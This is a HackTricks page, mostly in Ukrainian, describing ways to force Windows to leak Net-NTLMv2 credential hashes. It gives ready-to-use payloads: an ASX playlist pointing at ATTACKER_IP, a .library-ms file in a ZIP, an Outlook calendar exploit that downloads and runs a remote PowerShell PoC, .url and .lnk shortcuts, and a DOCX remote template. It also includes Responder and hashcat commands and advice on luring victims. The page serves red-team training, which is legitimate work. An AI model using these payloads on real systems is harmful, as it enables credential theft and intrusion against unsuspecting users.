Місця для steal NTLM creds

Reading time: 6 minutes

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

Перегляньте всі чудові ідеї з https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ — від завантаження microsoft word файлу онлайн до джерела ntlm leaks: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md і https://github.com/p0dalirius/windows-coerced-authentication-methods

Windows Media Player playlists (.ASX/.WAX)

Якщо ви зможете змусити ціль відкрити або переглянути Windows Media Player playlist, яким ви керуєте, ви можете leak Net‑NTLMv2, вказавши елемент на UNC path. WMP спробує отримати вказане медіа через SMB і аутентифікується неявно.

Приклад payload:

xml
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>

Потік збору та cracking:

bash
# Capture the authentication
sudo Responder -I <iface>

# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt

Вбудований у ZIP .library-ms NTLM leak (CVE-2025-24071/24055)

Windows Explorer неналежним чином обробляє файли .library-ms, коли їх відкривають безпосередньо з ZIP-архіву. Якщо визначення бібліотеки вказує на віддалений UNC-шлях (наприклад, \attacker\share), просте перегортання/запуск .library-ms всередині ZIP змушує Explorer перелічити цей UNC і надіслати NTLM-аутентифікацію зловмиснику. В результаті отримується NetNTLMv2, який можна зламати офлайн або потенційно ретрансльовати.

Мінімальний .library-ms, який вказує на UNC зловмисника

xml
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<version>6</version>
<name>Company Documents</name>
<isLibraryPinned>false</isLibraryPinned>
<iconReference>shell32.dll,-235</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.14.2\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Операційні кроки

  • Створіть файл .library-ms з наведеним вище XML (вкажіть ваш IP/hostname).
  • Заархівуйте його (on Windows: Send to → Compressed (zipped) folder) і доставте ZIP до цілі.
  • Запустіть NTLM capture listener і дочекайтеся, поки жертва відкриє .library-ms зсередини ZIP.

Outlook calendar reminder sound path (CVE-2023-23397) – zero‑click Net‑NTLMv2 leak

Microsoft Outlook for Windows обробляв розширену MAPI-властивість PidLidReminderFileParameter в елементах календаря. Якщо ця властивість вказує на UNC path (e.g., \attacker\share\alert.wav), Outlook звертався до SMB share при спрацьовуванні нагадування, що призводило до leak Net‑NTLMv2 користувача без будь‑якого кліка. Цю вразливість виправили 14 березня 2023 року, але вона все ще дуже актуальна для legacy/untouched fleets та для історичного incident response.

Quick exploitation with PowerShell (Outlook COM):

powershell
# Run on a host with Outlook installed and a configured mailbox
IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
# Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav

Сторона Listener:

bash
sudo responder -I eth0  # or impacket-smbserver to observe connections

Notes

  • Жертві потрібно, щоб Outlook for Windows був запущений тільки в момент спрацьовування нагадування.
  • leak дає Net‑NTLMv2, придатний для offline cracking або relay (не pass‑the‑hash).

.LNK/.URL icon-based zero‑click NTLM leak (CVE‑2025‑50154 – bypass of CVE‑2025‑24054)

Windows Explorer автоматично відображає іконки ярликів. Останні дослідження показали, що навіть після квітневого патчу Microsoft 2025 для UNC‑icon shortcuts все ще можна було спровокувати NTLM аутентифікацію без кліків, розмістивши ціль ярлика на UNC‑шляху та зберігши іконку локально (обхід патчу отримав CVE‑2025‑50154). Простий перегляд папки змушує Explorer отримувати метадані з віддаленої цілі, відправляючи NTLM на атакуючий SMB server.

Minimal Internet Shortcut payload (.url):

ini
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0

Payload для ярлика програми (.lnk) через PowerShell:

powershell
$lnk = "$env:USERPROFILE\Desktop\lab.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\10.10.14.2\share\payload.exe"  # remote UNC target
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()

Ідеї доставки

  • Помістіть ярлик у ZIP і підштовхніть жертву переглянути його.
  • Помістіть ярлик у мережеву папку з правами запису, яку жертва відкриє.
  • Поєднайте з іншими файлами-приманками в тій самій папці, щоб Explorer попередньо переглядав ці елементи.

Office remote template injection (.docx/.dotm) to coerce NTLM

Документи Office можуть посилатися на зовнішній шаблон. Якщо вказати вкладений шаблон як UNC path, відкриття документа спричинить аутентифікацію до SMB.

Мінімальні зміни в DOCX relationships (всередині word/):

  1. Відредагуйте word/settings.xml і додайте посилання на вкладений шаблон:
xml
<w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
  1. Відредагуйте word/_rels/settings.xml.rels і вкажіть rId1337 на ваш UNC:
xml
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
  1. Перепакуйте в .docx і доставте. Запустіть SMB capture listener і чекайте на відкриття.

Після захоплення: ідеї щодо relaying або зловживання NTLM див.:

HackTricks

Посилання

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks